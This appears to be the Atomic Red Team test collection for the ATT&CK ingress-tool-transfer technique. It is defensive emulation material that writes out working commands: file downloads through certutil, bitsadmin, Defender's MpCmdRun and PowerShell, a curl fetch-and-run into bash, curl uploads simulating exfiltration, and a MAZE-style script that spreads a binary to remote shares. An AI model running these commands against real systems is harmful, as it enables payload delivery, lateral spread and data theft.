Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as `IEX(New-Object Net.WebClient).downloadString()` and `Invoke-WebRequest`. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms) Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
Utilize rsync to perform a remote file copy (push)
Supported Platforms: Linux, macOS
auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive rsync | path | /tmp/victim-files |
| remote_host | Remote host to copy toward | string | victim-host |
| local_path | Path of folder to copy | path | /tmp/adversary-rsync/ |
| username | User account to authenticate on remote host | string | victim |

Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

```sh
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```

Dependencies: Run with `sh`!
Check Prereq Commands:

```sh
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
```

Get Prereq Commands:

```sh
(pkg install -y rsync)||(sudo apt-get -y install rsync)
```
Utilize rsync to perform a remote file copy (pull)
Supported Platforms: Linux, macOS
auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Path of folder to copy | path | /tmp/adversary-rsync/ |
| remote_host | Remote host to copy from | string | adversary-host |
| local_path | Local path to receive rsync | path | /tmp/victim-files |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with `sh`!

```sh
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```

Dependencies: Run with `sh`!
Check Prereq Commands:

```sh
if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi
```

Get Prereq Commands:

```sh
(pkg install -y rsync)||(sudo apt-get -y install rsync)
```
Utilize scp to perform a remote file copy (push)
Supported Platforms: Linux, macOS
auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive scp | path | /tmp/victim-files/ |
| local_file | Path of file to copy | path | /tmp/adversary-scp |
| remote_host | Remote host to copy toward | string | victim-host |
| username | User account to authenticate on remote host | string | victim |

Attack Commands: Run with `sh`!

```sh
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```
Utilize scp to perform a remote file copy (pull)
Supported Platforms: Linux, macOS
auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote host to copy from | string | adversary-host |
| local_path | Local path to receive scp | path | /tmp/victim-files/ |
| remote_file | Path of file to copy | path | /tmp/adversary-scp |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with `sh`!

```sh
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
Utilize sftp to perform a remote file copy (push)
Supported Platforms: Linux, macOS
auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_path | Remote path to receive sftp | path | /tmp/victim-files/ |
| local_file | Path of file to copy | path | /tmp/adversary-sftp |
| remote_host | Remote host to copy toward | string | victim-host |
| username | User account to authenticate on remote host | string | victim |

Attack Commands: Run with `sh`!

```sh
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```
Utilize sftp to perform a remote file copy (pull)
Supported Platforms: Linux, macOS
auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote host to copy from | string | adversary-host |
| local_path | Local path to receive sftp | path | /tmp/victim-files/ |
| remote_file | Path of file to copy | path | /tmp/adversary-sftp |
| username | User account to authenticate on remote host | string | adversary |

Attack Commands: Run with `sh`!

```sh
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
Use the certutil -urlcache argument to download a file from the web. Note: /urlcache also works!
Supported Platforms: Windows
auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| local_path | Local path to place file | path | Atomic-license.txt |

Attack Commands: Run with `command_prompt`!

```cmd
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```

Cleanup Commands:

```cmd
del #{local_path} >nul 2>&1
```
Use the certutil -verifyctl argument to download a file from the web. Note: /verifyctl also works!
Supported Platforms: Windows
auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| local_path | Local path to place file | path | Atomic-license.txt |

Attack Commands: Run with `powershell`!

```powershell
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
```

Cleanup Commands:

```powershell
Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore
```
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.
Supported Platforms: Windows
auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bits_job_name | Name of the created BITS job | string | qcxjb7 |
| local_path | Local path to place file | path | %temp%\Atomic-license.txt |
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |

Attack Commands: Run with `command_prompt`!

```cmd
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```
This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families.
Supported Platforms: Windows
auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| destination_path | Destination path to file | path | $env:TEMP\Atomic-license.txt |

Attack Commands: Run with `powershell`!

```powershell
(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
```

Cleanup Commands:

```powershell
Remove-Item #{destination_path} -Force -ErrorAction Ignore
```
OSTap copies itself in a specific way to shares and secondary drives. This test emulates that activity.
Supported Platforms: Windows
auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Path to create remote file at. Default is local admin share. | string | \\localhost\C$ |

Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms across network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd
```
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will copy cmd.exe to c:\ under the name svchost.exe, then execute svchost.exe with output to a txt file on the local admin share.
Supported Platforms: Windows
auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f

Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
```

Cleanup Commands:

```cmd
del C:\T1105.txt >nul 2>&1
del C:\svchost.exe >nul 2>&1
```
Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory.
More info and how to find your version can be found here: https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
Supported Platforms: Windows
auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| local_path | Location to save downloaded file | path | %temp%\Atomic-license.txt |

Attack Commands: Run with `command_prompt`!

```cmd
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
```

Cleanup Commands:

```cmd
del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1
```

Dependencies: Run with `command_prompt`!
Check Prereq Commands:

```cmd
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe /? >nul 2>&1
```

Get Prereq Commands:

```cmd
Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"
```
Download a remote file using the whois utility
Supported Platforms: Linux, macOS
auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote hostname or IP address | string | localhost |
| remote_port | Remote port to connect to | integer | 8443 |
| output_file | Path of file to save output to | path | /tmp/T1105.whois.out |
| query | Query to send to remote server | string | Hello from Atomic Red Team test T1105 |
| timeout | Timeout period before ending process (seconds) | integer | 1 |

Attack Commands: Run with `sh`!

```sh
timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
```

Cleanup Commands:

```sh
rm -f #{output_file}
```

Dependencies: Run with `sh`!
Check Prereq Commands:

```sh
which whois && which timeout
```

Get Prereq Commands:

```sh
echo "Please install timeout and the whois package"
```
Use PowerShell to download and write an arbitrary file from the internet. The example is from the 2021 Threat Detection Report by Red Canary.
Supported Platforms: Windows
auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_remote_file | File to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt |
| output_file | File to write to | string | LICENSE.txt |

Attack Commands: Run with `powershell`!

```powershell
(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
```
Simulate a file download using finger.exe. Connects to localhost by default; use the custom input argument to test finger connecting to an external server. Because this is being tested against localhost, you should not expect a successful connection.
References:
https://www.exploit-db.com/exploits/48815
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
Supported Platforms: Windows
auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_host | Remote hostname or IP address | string | localhost |

Attack Commands: Run with `command_prompt`!

```cmd
finger base64_filedata@#{remote_host}
```
Use IMEWDBLD.exe (built in to Windows) to download a file. This will throw an error for an invalid dictionary file.
Downloaded files can be found in `%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>\`
Supported Platforms: Windows
auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | Location of file to be downloaded. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml |
| file_name | Name of the file to be downloaded without extension. | string | T1105 |

Attack Commands: Run with `powershell`!

```powershell
$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}
```

Cleanup Commands:

```powershell
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
```
The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and write it to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not.
Supported Platforms: Windows
auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_download | File to download | string | https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll |
| curl_path | Path to curl.exe | path | C:\Windows\System32\Curl.exe |

Attack Commands: Run with `command_prompt`!

```cmd
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll
```

Cleanup Commands:

```cmd
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
```
The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration. Expected output will include whether the file uploaded successfully or not.
Supported Platforms: Windows
auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| curl_path | Path to curl.exe | path | C:\Windows\System32\Curl.exe |
| remote_destination | Remote destination | string | www.example.com |
| file_path | File to upload | string | c:\temp\atomictestfile.txt |

Attack Commands: Run with `command_prompt`!

```cmd
#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
```

Check Prereq Commands:

```powershell
if (Test-Path #{file_path}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
echo "This is an Atomic Test File" > #{file_path}
```
Uses cmdl32 to download an arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection; here the config is modified to download the arbitrary file instead. cmdl32.exe would normally detect the payload as not being a VPN server profile and delete it; the test avoids this by setting a temporary TMP folder and denying the delete permission on all files for the user. Upon successful execution the test will open the Calculator and Notepad executables for 10 seconds.
References:
https://twitter.com/ElliotKillick/status/1455897435063074824
https://github.com/LOLBAS-Project/LOLBAS/pull/151
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/
https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
Supported Platforms: Windows
auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Path_to_file | Path to the Batch script | path | PathToAtomicsFolder\T1105\src\T1105.bat |

Attack Commands: Run with `command_prompt`!

```cmd
"#{Path_to_file}" 1>NUL
```

Cleanup Commands:

```cmd
del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Test-Path "#{Path_to_file}") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "#{Path_to_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105.bat" -OutFile "#{Path_to_file}"
```
This test simulates MAZE ransomware's propagation script, which searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. Upon successful execution, the specified binary file will be copied to each online machine, and a list of the online machines as well as a list of offline machines will be written to a specified location.
Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
Supported Platforms: Windows
auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_file | Binary file to copy to remote machines | string | $env:comspec |
| exe_remote_folder | Path to store executable on remote machine (no drive letter) | string | \Windows\Temp\T1105.exe |
| remote_drive_letter | Remote drive letter | string | C |

Attack Commands: Run with `powershell`!

```powershell
$machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
$offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
$completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
foreach ($machine in get-content -path "$machine_list")
{if (test-connection -Count 1 -computername $machine -quiet)
{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
echo $machine >> "$completed_list"
wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
else
{echo $machine >> "$offline_list"}}
```

Cleanup Commands:

```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Test-Path #{binary_file}) {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
write-host "The binary_file input parameter must be set to a binary that exists on this computer."
```

Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
```
Create a ZIP file from a folder in a remote drive
Supported Platforms: Windows
auto_generated_guid: 49845fc1-7961-4590-a0f0-3dbcf065ae7e

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Path_unc | Path to the UNC folder | path | \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\ |
| Path_PrintBrm | Path to PrintBrm.exe | path | C:\Windows\System32\spool\tools\PrintBrm.exe |

Attack Commands: Run with `command_prompt`!

```cmd
del %TEMP%\PrintBrm.zip >nul 2>&1
#{Path_PrintBrm} -b -d #{Path_unc} -f %TEMP%\PrintBrm.zip -O FORCE
```

Cleanup Commands:

```cmd
del %TEMP%\PrintBrm.zip >nul 2>&1
```
Copy file.cab to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
Supported Platforms: Windows
auto_generated_guid: 54782d65-12f0-47a5-b4c1-b70ee23de6df

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| replace_cab | Path to the cab file | path | PathToAtomicsFolder\T1105\src\redcanary.cab |
| Path_replace | Path to replace.exe | path | C:\Windows\System32\replace.exe |

Attack Commands: Run with `command_prompt`!

```cmd
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} "#{replace_cab}" %TEMP% /A
```

Cleanup Commands:

```cmd
del %TEMP%\redcanary.cab >nul 2>&1
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Test-Path "#{replace_cab}") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "#{replace_cab}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/redcanary.cab" -OutFile "#{replace_cab}"
```
Copy UNC file to destination
Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
Supported Platforms: Windows
auto_generated_guid: ed0335ac-0354-400c-8148-f6151d20035a

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| replace_cab | UNC path to the cab file | path | \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab |
| Path_replace | Path to replace.exe | path | C:\Windows\System32\replace.exe |

Attack Commands: Run with `command_prompt`!

```cmd
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} #{replace_cab} %TEMP% /A
```

Cleanup Commands:

```cmd
del %TEMP%\redcanary.cab >nul 2>&1
```
Use certreq to download a file from the web
Supported Platforms: Windows
auto_generated_guid: 6fdaae87-c05b-42f8-842e-991a74e8376b

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_path | Local path to place file | string | %temp%\Atomic-license.txt |
| remote_file | URL of file to copy | url | https://example.com |

Attack Commands: Run with `command_prompt`!

```cmd
certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}
```

Cleanup Commands:

```cmd
del #{local_path} >nul 2>&1
```
Use wscript to run a local VisualBasic file to download a remote file
Supported Platforms: Windows
auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vbscript_file | Full path to the VisualBasic script downloading the file | string | PathToAtomicsFolder\T1105\src\T1105-download-file.vbs |

Attack Commands: Run with `command_prompt`!

```cmd
wscript.exe "#{vbscript_file}"
```

Cleanup Commands:

```cmd
del Atomic-License.txt >nul 2>&1
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Test-Path "#{vbscript_file}") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "#{vbscript_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/T1105-download-file.vbs" -OutFile "#{vbscript_file}"
```
Utilize Linux curl to download a remote file, chmod +x it and run it.
Supported Platforms: Linux
auto_generated_guid: bdc373c5-e9cf-4563-8a7b-a9ba720a90f3

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | URL of remote payload | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh |
| payload_name | Payload name | string | atomic.sh |

Attack Commands: Run with `sh`!

```sh
# chain the steps with && so the payload only runs once it has been fetched and made executable
curl -sO #{remote_url} && chmod +x #{payload_name} && bash #{payload_name}
```

Cleanup Commands:

```sh
rm #{payload_name}
```
Use nimgrab.exe to download a file from the web.
Supported Platforms: Windows
auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| destination_path | Destination path to file | path | $env:TEMP\Atomic-license.txt |

Attack Commands: Run with `command_prompt`!

```cmd
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
```

Cleanup Commands:

```cmd
del #{destination_path} >nul 2>&1
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\nim.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\nim.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\nim" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe" "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe"
```
Use `iwr` or `Invoke-WebRequest` with the -URI argument to download a file from the web. Note: omitting -URI also works in some versions.
Supported Platforms: Windows
auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of file to copy | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| local_path | Local path to place file | path | %temp%\Atomic-license.txt |

Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
```

Cleanup Commands:

```cmd
del %temp%\Atomic-license.txt >nul 2>&1
```
GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files (.zip) from the internet/GitHub.
Reference:
Upon execution, a sample zip file will be downloaded to the C:\Temp\Sample folder.
Supported Platforms: Windows
auto_generated_guid: 66ee226e-64cb-4dae-80e3-5bf5763e4a51

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_file_url | URL of the target ZIP file (e.g. https://example.com/test.zip) | url | https://getsamplefiles.com/download/zip/sample-2.zip |
| working_dir | The directory where GUP.exe and its dependencies exist | path | PathToAtomicsFolder\T1105\bin\ |
| gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | string | PathToAtomicsFolder\T1105\bin\GUP.exe |
| target_file_sha256 | SHA256 value of target ZIP file | string | CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6 |

Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
mkdir "c:\Temp"
cd #{working_dir}
GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
```

Cleanup Commands:

```cmd
rmdir /s /q "C:\Temp\Sample" >nul 2>nul
```

Dependencies: Run with `powershell`!
Check Prereq Commands:

```powershell
if (Test-Path "#{gup_executable}") {exit 0} else {exit 1}
```

Get Prereq Commands:

```powershell
New-Item -Type Directory (split-path "#{gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/bin/GUP.exe" -OutFile "#{gup_executable}"
```
Use nscurl to download and write a file/payload from the internet. `-k` disables certificate checking; `-o` sets the output destination.
Supported Platforms: macOS
auto_generated_guid: 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_file | URL of remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt |
| destination_path | Local path to place remote file | path | license.txt |

Attack Commands: Run with `sh`!

```sh
nscurl -k "#{remote_file}" -o "#{destination_path}"
```

Cleanup Commands:

```sh
rm "#{destination_path}"
```
